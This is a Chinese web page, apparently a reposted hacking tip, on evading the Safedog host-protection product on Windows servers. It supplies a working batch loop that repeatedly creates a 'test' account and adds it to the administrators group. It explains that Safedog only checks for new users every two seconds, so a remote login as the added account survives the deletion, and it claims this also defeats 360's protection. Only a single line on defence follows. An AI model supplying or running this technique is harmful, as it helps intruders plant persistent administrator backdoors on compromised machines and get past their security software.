您现在的位置是:网站首页> 编程资料编程资料
安全狗下添加用户的另一方法(大量操作实现突破)_入侵防御_网络安全_
2023-05-24
580人已围观
简介 安全狗下添加用户的另一方法(大量操作实现突破)_入侵防御_网络安全_
前几天发现的,略无语,因为简单到。。
直接在命令行下使用
for /l %i in (1,1,1000) do @net user test test /add&@net localgroup administrators test /add
另存为 ad.bat 使用
for /l %%i in (1,1,1000) do @net user test test /add&@net localgroup administrators test /add
命令的意思是循环一千次执行do后面的命令add user
要说一下安全狗拦截添加用户的原理
安全狗的拦截并不是真正意义上的拦截,而是每2秒钟检测一次是否有新添加的用户,如果有新用户,则删除。
所以我们直接net user test test /add 是能够成功添加用户的,只不过两秒后被安全狗删除了而已。
上面的命令是不断的重复加用户的操作,直到1000次,大概两分钟就会执行完毕自动退出{远程登录test后,无论test是否已经被删除,都不会受到影响},如果需要无限循环,将括号内的数字改为(1,0,1)即可,然后记得要手动停止
每两秒检测一次
更无语的是,如果安全狗和360同时存在,那么360的拦截添加用户的功能将变得无效
直接使用上面那个命令即可
防范:安全钩+mcafee同时控制,基本上不会出现这个问题。
相关内容
- 过安全狗/D盾/360的PHP一句话木马与防范方法_脚本攻防_网络安全_
- ODOR1–PHP extract 后门使用方法_脚本攻防_网络安全_
- 浅说双引号被过滤时一句话的插入与防范_脚本攻防_网络安全_
- upfile asp文件上传 又一奇迹般的突破_脚本攻防_网络安全_
- php注入基本步骤小结_脚本攻防_网络安全_
- Z-blog后台拿SHELL方法总结_脚本攻防_网络安全_
- Ecshop后台拿shell方法总结_脚本攻防_网络安全_
- MSSQL中两种特别的执行命令的方法_脚本攻防_网络安全_
- webshell提权经验分享_脚本攻防_网络安全_
- 利用星外虚拟机的入侵 经验分析_脚本攻防_网络安全_
